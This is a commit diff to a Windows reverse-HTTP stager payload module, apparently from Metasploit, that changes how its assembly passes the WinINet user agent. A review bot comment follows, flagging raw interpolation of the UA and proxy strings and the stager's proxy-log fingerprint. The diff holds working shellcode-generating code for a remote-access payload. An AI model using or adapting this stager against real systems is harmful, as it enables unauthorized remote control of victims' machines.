pass NULL if the UA field is empty
parent
6f8fc55b86
commit
3dca52510d
|
@ -255,38 +255,43 @@ module Payload::Windows::ReverseHttp
|
|||
xor ebx, ebx ; Set ebx to NULL to use in future arguments
|
||||
^
|
||||
|
||||
asm << %Q^
|
||||
internetopen:
|
||||
push ebx ; DWORD dwFlags
|
||||
^
|
||||
if proxy_enabled
|
||||
asm << %Q^
|
||||
internetopen:
|
||||
push ebx ; DWORD dwFlags
|
||||
push esp ; LPCTSTR lpszProxyBypass ("" = empty string)
|
||||
call get_proxy_server
|
||||
db "#{proxy_info}", 0x00
|
||||
get_proxy_server:
|
||||
; LPCTSTR lpszProxyName (via call)
|
||||
push 3 ; DWORD dwAccessType (INTERNET_OPEN_TYPE_PROXY = 3)
|
||||
call get_useragent
|
||||
db "#{opts[:ua]}", 0x00
|
||||
; LPCTSTR lpszAgent (via call)
|
||||
get_useragent:
|
||||
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
|
||||
call ebp
|
||||
^
|
||||
else
|
||||
asm << %Q^
|
||||
internetopen:
|
||||
push ebx ; DWORD dwFlags
|
||||
push ebx ; LPCTSTR lpszProxyBypass (NULL)
|
||||
push ebx ; LPCTSTR lpszProxyName (NULL)
|
||||
push ebx ; DWORD dwAccessType (PRECONFIG = 0)
|
||||
^
|
||||
end
|
||||
if opts[:ua].to_s.empty?
|
||||
asm << %Q^
|
||||
push ebx ; LPCTSTR lpszAgent (NULL)
|
||||
^
|
||||
else
|
||||
asm << %Q^
|
||||
push ebx ; LPCTSTR lpszProxyBypass (NULL)
|
||||
call get_useragent
|
||||
db "#{opts[:ua]}", 0x00
|
||||
; LPCTSTR lpszAgent (via call)
|
||||
get_useragent:
|
||||
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
|
||||
call ebp
|
||||
^
|
||||
end
|
||||
asm << %Q^
|
||||
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
|
||||
call ebp
|
||||
^
|
||||
|
||||
asm << %Q^
|
||||
internetconnect:
|
||||
|
|
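Review bot: The user agent is still interpolated raw into the assembler source at `db "#{opts[:ua]}", 0x00`, so the new `opts[:ua].to_s.empty?` branch covers an empty value but not one containing `"` or a line break, which would end the string literal early and yield broken or unintended assembly. `db "#{proxy_info}", 0x00` in the proxy branch has the same shape. Unless the caller already validates these options (the method starts above this hunk, so I cannot tell), reject such values before building the string, e.g. `raise ArgumentError, 'UA must not contain quotes or line breaks' if opts[:ua].to_s =~ /["\r\n]/`. The `; LPCTSTR lpszAgent (NULL)` comment could also state the effect on the wire: as far as I know WinINet then sends the request without a User-Agent header, which is worth recording for anyone matching this stager's traffic in proxy logs.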